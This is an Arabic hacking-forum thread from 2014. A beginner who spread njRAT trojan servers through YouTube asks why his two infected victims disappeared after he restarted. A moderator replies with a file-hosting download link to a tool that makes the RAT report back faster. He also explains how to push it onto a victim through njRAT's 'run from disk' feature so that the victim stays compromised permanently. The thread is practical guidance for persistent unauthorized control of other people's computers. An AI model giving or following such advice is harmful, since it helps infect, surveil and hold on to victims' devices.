منتدى هكر ام الساهك العالمي
منتدى قراصنة هكر ام الساهك العالمي هو الدخول الخاص بك إلى العالم المظلم من القرصنة
منتدى قراصنة هكر ام الساهك العالمي هو الدخول الخاص بك إلى العالم المظلم من القرصنة
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

منتدى هكر ام الساهك العالمي اكبر منتدى هكر عربي متخصص بجديد الثغرات واختراق المواقع والاجهزة

الرئيسيةأحدث الصورالتسجيلدخول

ممكن مساعدة بخصوص النجرات

2 مشترك
كاتب الموضوعرسالة
dfdr2050

ممكن مساعدة بخصوص النجرات Empty
مُساهمةموضوع: ممكن مساعدة بخصوص النجرات   ممكن مساعدة بخصوص النجرات I_icon_minitimeالخميس أغسطس 28, 2014 3:58 pm

ما في عندكم قسم للاسفسارات ولحلول؟

المشكلة اني انا رفعت سيرفر لنجرات على اليوتيوب كنت فاتح اجاني ضحيتين اوبساعة طفيتو وشغلتو اختفو بعديها دخلت من جهاز تاني ونزلت السيرفرو وما بعت التبليغ
اعملت سيرفر تايت وجربتو زبط يعني كل ما بدي اخترق بطر اعمل سيرفر جديد وبعتو والقديم ما بشتغل للعلم اتنين مشفرات ممكن مساعدة على فكرة انا جديد
مراقب المنتدى

ممكن مساعدة بخصوص النجرات Empty
مُساهمةموضوع: رد: ممكن مساعدة بخصوص النجرات   ممكن مساعدة بخصوص النجرات I_icon_minitimeالجمعة أغسطس 29, 2014 8:04 am

حبيبي

استعمل هذا البرنامج

هذا البرنامج هو برنامج يعمل اتصال مع السيرفر الللي موجود عندك ويصنع لنا سيرفر تصل سرعة التبليغ فيه 6.3 ثانيه

كل ماعليك فعله بعد تحميل هذا البرنامج هو طريقتين

إما تفتحه بنفسك وتضع السيرفر والاعدادات

او اذا جاك ضحيه تاخذ هالبرنامج وتروح بالنجرات لخيار run <<run from disk وتختار هالبرنامج وترفعه وتشغله على الضحيه

وبكذا يتثبت الضحيه للابد حبيبي

التحميل :

http://www.mediafire.com/download/ovf6yureyaxr9c6/%D8%AA%D8%AB%D8%A8%D9%8A%D8%AA+%D8%B6%D8%AD%D8%A7%D9%8A%D8%A7+%D9%86%D8%AC%D8%B1%D8%A7%D8%AA.rar

ممكن مساعدة بخصوص النجرات
صفحة 1 من اصل 1